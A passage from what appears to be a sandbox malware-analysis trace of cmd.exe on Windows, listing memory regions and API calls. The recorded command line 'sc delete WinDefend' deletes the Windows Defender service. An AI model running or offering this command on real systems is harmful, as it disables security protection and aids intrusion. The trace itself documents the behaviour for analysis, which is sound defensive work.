0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1560 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1561 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1562 start_va = 0x2e0000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1563 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1564 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1565 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1767 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1768 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1769 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1770 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1771 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1772 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1773 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 1774 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 1775 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1776 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1777 start_va = 0x754b0000 end_va = 0x754b6fff entry_point = 0x754b0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1778 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1779 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1780 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1781 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1782 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1783 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1784 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1785 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1786 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1787 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1820 start_va = 0x510000 end_va = 0x697fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1821 start_va = 0x6c0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 1822 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1823 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1824 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1825 start_va = 0x120000 end_va = 0x121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1826 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1827 start_va = 0x240000 end_va = 0x240fff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 1828 start_va = 0x6d0000 end_va = 0x850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 1829 start_va = 0x860000 end_va = 0x1c5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 1830 start_va = 0x1c60000 end_va = 0x1fa2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c60000" filename = "" Region: id = 1864 start_va = 0x1fb0000 end_va = 0x227efff entry_point = 0x1fb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 108 os_tid = 0x89c [0120.284] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fd54 | out: lpSystemTimeAsFileTime=0x22fd54*(dwLowDateTime=0xe82db640, dwHighDateTime=0x1d48db2)) [0120.284] GetCurrentProcessId () returned 0x8b0 [0120.284] GetCurrentThreadId () returned 0x89c [0120.284] GetTickCount () returned 0x2a3ad [0120.284] QueryPerformanceCounter (in: lpPerformanceCount=0x22fd4c | out: lpPerformanceCount=0x22fd4c*=1818790800000) returned 1 [0120.285] GetModuleHandleA (lpModuleName=0x0) returned 0x4a090000 [0120.285] __set_app_type (_Type=0x1) [0120.285] __p__fmode () returned 0x75ab31f4 [0120.285] __p__commode () returned 0x75ab31fc [0120.285] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0b21a6) returned 0x0 [0120.285] __getmainargs (in: _Argc=0x4a0b4238, _Argv=0x4a0b4240, _Env=0x4a0b423c, _DoWildCard=0, _StartInfo=0x4a0b4140 | out: _Argc=0x4a0b4238, _Argv=0x4a0b4240, _Env=0x4a0b423c) returned 0 [0120.286] GetCurrentThreadId () returned 0x89c [0120.286] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x89c) returned 0x60 [0120.286] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000 [0120.286] GetProcAddress (hModule=0x76220000, lpProcName="SetThreadUILanguage") returned 0x7624a84f [0120.286] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.365] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0120.365] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fce4 | out: phkResult=0x22fce4*=0x0) returned 0x2 [0120.365] VirtualQuery (in: lpAddress=0x22fd1b, lpBuffer=0x22fcb4, dwLength=0x1c | out: lpBuffer=0x22fcb4*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.365] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fcb4, dwLength=0x1c | out: lpBuffer=0x22fcb4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0120.365] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fcb4, dwLength=0x1c | out: lpBuffer=0x22fcb4*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0120.365] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fcb4, dwLength=0x1c | out: lpBuffer=0x22fcb4*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.366] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fcb4, dwLength=0x1c | out: lpBuffer=0x22fcb4*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0120.366] GetConsoleOutputCP () returned 0x1b5 [0120.366] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0120.366] SetConsoleCtrlHandler (HandlerRoutine=0x4a0ae72a, Add=1) returned 1 [0120.366] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.366] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0120.366] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.366] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0b41ac | out: lpMode=0x4a0b41ac) returned 1 [0120.366] _get_osfhandle (_FileHandle=1) returned 0x7 [0120.366] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0120.366] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.366] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0b41b0 | out: lpMode=0x4a0b41b0) returned 1 [0120.367] _get_osfhandle (_FileHandle=0) returned 0x3 [0120.367] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0120.367] GetEnvironmentStringsW () returned 0x422318* [0120.367] FreeEnvironmentStringsW (penv=0x422318) returned 1 [0120.367] GetEnvironmentStringsW () returned 0x422318* [0120.367] FreeEnvironmentStringsW (penv=0x422318) returned 1 [0120.367] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec54 | out: phkResult=0x22ec54*=0x68) returned 0x0 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x0, lpData=0x22ec60*=0x0, lpcbData=0x22ec58*=0x1000) returned 0x2 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x4, lpData=0x22ec60*=0x1, lpcbData=0x22ec58*=0x4) returned 0x0 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x0, lpData=0x22ec60*=0x1, lpcbData=0x22ec58*=0x1000) returned 0x2 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x4, lpData=0x22ec60*=0x0, lpcbData=0x22ec58*=0x4) returned 0x0 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x4, lpData=0x22ec60*=0x40, lpcbData=0x22ec58*=0x4) returned 0x0 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x4, lpData=0x22ec60*=0x40, lpcbData=0x22ec58*=0x4) returned 0x0 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x0, lpData=0x22ec60*=0x40, lpcbData=0x22ec58*=0x1000) returned 0x2 [0120.368] RegCloseKey (hKey=0x68) returned 0x0 [0120.368] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ec54 | out: phkResult=0x22ec54*=0x68) returned 0x0 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x0, lpData=0x22ec60*=0x40, lpcbData=0x22ec58*=0x1000) returned 0x2 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x4, lpData=0x22ec60*=0x1, lpcbData=0x22ec58*=0x4) returned 0x0 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x0, lpData=0x22ec60*=0x1, lpcbData=0x22ec58*=0x1000) returned 0x2 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x4, lpData=0x22ec60*=0x0, lpcbData=0x22ec58*=0x4) returned 0x0 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x4, lpData=0x22ec60*=0x9, lpcbData=0x22ec58*=0x4) returned 0x0 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x4, lpData=0x22ec60*=0x9, lpcbData=0x22ec58*=0x4) returned 0x0 [0120.368] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ec5c, lpData=0x22ec60, lpcbData=0x22ec58*=0x1000 | out: lpType=0x22ec5c*=0x0, lpData=0x22ec60*=0x9, lpcbData=0x22ec58*=0x1000) returned 0x2 [0120.368] RegCloseKey (hKey=0x68) returned 0x0 [0120.368] time (in: timer=0x0 | out: timer=0x0) returned 0x5c09a260 [0120.368] srand (_Seed=0x5c09a260) [0120.368] GetCommandLineW () returned="/c sc delete WinDefend" [0120.368] GetCommandLineW () returned="/c sc delete WinDefend" [0120.368] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0b5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0120.369] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x424780, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0120.369] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0120.369] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0120.369] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0120.369] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.369] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0120.369] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0120.369] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0120.369] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0120.369] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0120.369] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0120.369] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0120.369] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0120.369] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0120.369] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22fa20 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0120.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x22fa20, lpFilePart=0x22fa1c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x22fa1c*="system32") returned 0x13 [0120.369] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0120.369] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x22f79c | out: lpFindFileData=0x22f79c) returned 0x424990 [0120.369] FindClose (in: hFindFile=0x424990 | out: hFindFile=0x424990) returned 1 [0120.370] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x22f79c | out: lpFindFileData=0x22f79c) returned 0x422b18 [0120.370] FindClose (in: hFindFile=0x422b18 | out: hFindFile=0x422b18) returned 1 [0120.370] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0120.370] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0120.370] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0120.370] GetEnvironmentStringsW () returned 0x422b18* [0120.370] FreeEnvironmentStringsW (penv=0x422b18) returned 1 [0120.370] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0b5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0120.370] GetConsoleOutputCP () returned 0x1b5 [0120.371] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0120.371] GetUserDefaultLCID () returned 0x409 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a0b4950, cchData=8 | out: lpLCData=":") returned 2 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22fb60, cchData=128 | out: lpLCData="0") returned 2 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22fb60, cchData=128 | out: lpLCData="0") returned 2 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22fb60, cchData=128 | out: lpLCData="1") returned 2 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a0b4940, cchData=8 | out: lpLCData="/") returned 2 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a0b4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a0b4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a0b4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a0b4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a0b4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a0b4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a0b4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0120.371] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a0b4930, cchData=8 | out: lpLCData=".") returned 2 [0120.372] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a0b4920, cchData=8 | out: lpLCData=",") returned 2 [0120.372] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0120.372] GetConsoleTitleW (in: lpConsoleTitle=0x422b50, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.372] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000 [0120.373] GetProcAddress (hModule=0x76220000, lpProcName="CopyFileExW") returned 0x76253b92 [0120.373] GetProcAddress (hModule=0x76220000, lpProcName="IsDebuggerPresent") returned 0x76234a5d [0120.373] GetProcAddress (hModule=0x76220000, lpProcName="SetConsoleInputExeNameW") returned 0x7624a79d [0120.373] _wcsicmp (_String1="sc", _String2=")") returned 74 [0120.373] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0120.373] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0120.373] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0120.373] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0120.373] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0120.374] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0120.374] GetConsoleTitleW (in: lpConsoleTitle=0x22f858, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.375] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0120.375] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0120.375] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0120.375] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0120.375] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0120.375] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0120.375] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0120.375] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0120.375] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0120.375] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0120.375] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0120.375] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0120.375] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0120.375] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0120.375] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0120.375] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0120.375] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0120.375] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0120.375] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0120.375] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0120.375] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0120.375] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0120.375] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0120.375] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0120.375] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0120.375] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0120.375] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0120.375] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0120.375] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0120.375] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0120.375] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0120.375] _wcsicmp (_String1="sc", _String2="START") returned -17 [0120.375] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0120.375] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0120.375] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0120.376] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0120.376] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0120.376] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0120.376] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0120.376] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0120.376] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0120.376] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0120.376] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0120.376] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0120.376] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0120.376] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0120.376] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0120.376] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0120.376] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0120.376] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0120.376] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0120.376] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0120.376] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0120.376] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0120.376] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0120.376] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0120.376] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0120.376] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0120.376] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0120.376] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0120.376] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0120.376] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0120.376] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0120.376] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0120.376] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0120.376] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0120.376] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0120.376] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0120.376] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0120.376] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0120.376] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0120.376] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0120.377] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0120.377] _wcsicmp (_String1="sc", _String2="START") returned -17 [0120.377] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0120.377] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0120.377] _wcsicmp 